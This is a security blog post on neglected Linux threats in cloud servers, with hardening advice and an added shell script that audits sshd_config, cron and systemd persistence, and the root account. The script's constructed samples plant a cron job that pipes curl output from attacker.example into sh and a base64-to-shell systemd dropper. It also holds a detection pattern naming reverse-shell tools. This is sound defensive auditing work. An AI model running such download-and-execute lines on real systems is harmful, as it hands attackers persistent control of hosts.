In the antivirus industry, a large emphasis is placed on protecting Windows endpoints. Windows holds nearly 87% of the desktop market, compared with roughly 2% for Linux desktops. Because of this disparity, and because malware targeting Linux end users is rarely seen, some people argue that Linux is the safest and most secure operating system. That argument confuses attacker attention with inherent security.
When discussing threats to the Linux platform, however, we must consider that Linux runs nearly 90% of all cloud servers. Even on Microsoft's Azure cloud, Linux is the most popular guest operating system. The industry's rapid migration to the cloud, coupled with a lack of awareness of Linux threats, has contributed both to the low detection rates for Linux malware reported by most security vendors and to attackers' growing appetite for Linux systems.
Organizations can implement the following security best practices to mitigate cyber threats targeting Linux systems:
- Keep your systems patched and updated across all Linux servers and devices.
- Implement a runtime protection product and/or an application control (whitelisting, also called allowlisting) solution. Pairing it with a Genetic Malware Analysis approach to identifying malicious code gives better results with less tuning, because it cuts down the false positives that runtime protection solutions typically generate.
- Use SSH keys instead of passwords. For remote administration over SSH, disable password authentication on the server (PasswordAuthentication no in sshd_config) so that every login requires a key. An SSH service that still accepts passwords is a standing target for credential brute-force attacks; key-based login removes that attack surface.
- Perform a routine review of important system files. Remember that once malware is installed on a server or device, it will likely attempt to achieve persistence. On Linux servers especially, look for suspicious cron jobs (user crontabs, /etc/crontab, /etc/cron.d) and for unfamiliar SysV init scripts or systemd units and services, since these are the persistence mechanisms most commonly abused.
- Disable the root account for direct use. The root account has unrestricted read, write, and execute access to every file and command on a Linux system, so both attacker abuse and operator mistakes made as root can have critical consequences for the normal operation of the system; perform privileged administration through sudo instead. This article from TecMint explains four ways to disable the root account in Linux.
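As an added example, not code from the original post, the following POSIX shell script turns the SSH, persistence-review and root-account items above into checks that can be run on a host. File paths are parameters, so the demo runs offline against constructed sample files created in a temporary directory; the sshd_config contents, cron lines, systemd unit, shadow entries, host name and the pattern list are all assumptions for illustration, not data from a real system. It complements, and does not replace, a runtime protection product.

```shell
#!/bin/sh
# Added example, not code from the original post: audits an sshd_config copy,
# cron/systemd persistence locations and the root shadow entry. Paths are
# parameters, so the same functions run against the constructed samples below
# or against a real host (/etc/ssh/sshd_config, /etc/cron.d/*,
# /etc/systemd/system/*.service, /etc/shadow).

# Print the effective global value of an sshd_config keyword. sshd uses the
# first occurrence of a keyword, so stop at the first match; comment lines
# have '#' glued to $1 and never match. $3 is the built-in default assumed
# when the keyword is absent. Caveat: keywords inside Match blocks are ignored.
sshd_directive() {
    val=$(awk -v d="$2" 'tolower($1) == tolower(d) { print $2; exit }' "$1")
    if [ -n "$val" ]; then printf '%s\n' "$val"; else printf '%s\n' "$3"; fi
}

# Check the settings the list recommends. Returns the number of weak settings
# (0 = hardened). Defaults match current OpenSSH: PasswordAuthentication yes,
# PermitRootLogin prohibit-password, PubkeyAuthentication yes.
audit_sshd() {
    fails=0
    [ "$(sshd_directive "$1" PasswordAuthentication yes)" = no ] ||
        { echo "WEAK: PasswordAuthentication is not 'no' (brute force possible)"; fails=$((fails + 1)); }
    [ "$(sshd_directive "$1" PermitRootLogin prohibit-password)" = no ] ||
        { echo "WEAK: PermitRootLogin is not 'no'"; fails=$((fails + 1)); }
    [ "$(sshd_directive "$1" PubkeyAuthentication yes)" = yes ] ||
        { echo "WEAK: PubkeyAuthentication is off; key login would be impossible"; fails=$((fails + 1)); }
    return $fails
}

# Flag cron lines and systemd ExecStart lines matching patterns typical of
# downloader or reverse-shell one-liners. The pattern list is a constructed
# starting point, not a signature set. Prints "file: line" per hit and returns
# the hit count (0 = nothing flagged; counts above 255 wrap, so read the output).
scan_persistence() {
    pattern='curl |wget |base64 -d|/dev/tcp/|/dev/shm/|nc -e|bash -i'
    hits=0
    for f in "$@"; do
        [ -f "$f" ] || continue
        matches=$(grep -Ev '^[[:space:]]*#' "$f" | grep -E "$pattern") || continue
        printf '%s\n' "$matches" | sed "s|^|$f: |"
        hits=$((hits + $(printf '%s\n' "$matches" | wc -l)))
    done
    return $hits
}

# Exit 0 when root's password is locked in the given shadow file: a hash
# field starting with '!' or '*' cannot be matched by any password, which is
# what 'passwd -l root' produces.
root_locked() {
    field=$(awk -F: '$1 == "root" { print $2; exit }' "$1")
    case "$field" in
        '!'*|'*'*) return 0 ;;
        *)         return 1 ;;
    esac
}

# --- Constructed sample inputs (not captured from a real host) ---
SAMPLE_DIR=$(mktemp -d)
cat > "$SAMPLE_DIR/sshd_config.weak" <<'EOF'
# passwords allowed and root may use one: the brute-force target
PasswordAuthentication yes
PermitRootLogin yes
EOF
cat > "$SAMPLE_DIR/sshd_config.hardened" <<'EOF'
PubkeyAuthentication yes
PasswordAuthentication no
KbdInteractiveAuthentication no
PermitRootLogin no
EOF
cat > "$SAMPLE_DIR/cron.d_backup" <<'EOF'
# legitimate nightly job
0 2 * * * root /usr/local/bin/backup.sh
EOF
cat > "$SAMPLE_DIR/cron.d_sync" <<'EOF'
*/5 * * * * root curl -s http://attacker.example/s | sh >/dev/null 2>&1
EOF
cat > "$SAMPLE_DIR/dropper.service" <<'EOF'
[Unit]
Description=System update helper
[Service]
ExecStart=/bin/sh -c 'echo aGVsbG8= | base64 -d | sh'
Restart=always
[Install]
WantedBy=multi-user.target
EOF
printf 'root:!:19000:0:99999:7:::\n' > "$SAMPLE_DIR/shadow.locked"
printf 'root:$6$saltsalt$fakehashforillustration:19000:0:99999:7:::\n' > "$SAMPLE_DIR/shadow.unlocked"

echo "== sshd_config (weak sample)";     audit_sshd "$SAMPLE_DIR/sshd_config.weak" || true
echo "== sshd_config (hardened sample)"; audit_sshd "$SAMPLE_DIR/sshd_config.hardened" && echo "OK: no weak settings"
echo "== persistence locations";         scan_persistence "$SAMPLE_DIR"/cron.d_* "$SAMPLE_DIR"/*.service || echo "flagged $? entries"
echo "== root account";                  root_locked "$SAMPLE_DIR/shadow.unlocked" && echo "root is locked" || echo "WEAK: root has a usable password"
```

Run it as a normal user against the samples, or as root with the real paths substituted; the weak sample reports two SSH findings, the two planted persistence entries are printed with their file names, and the unlocked shadow entry is flagged. The pattern list is deliberately narrow so that the legitimate backup job produces no hit; extend it from your own triage findings rather than treating a clean run as proof of a clean host.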
As defenders, we lack the research and the critical IOCs that would let us understand, detect, and respond to Linux threats more consistently and at greater scale. Attackers are targeting the cloud more often, and the majority of cloud servers run Linux. We need to start paying more attention to this threat landscape if we are to level the uneven playing field between attackers and defenders.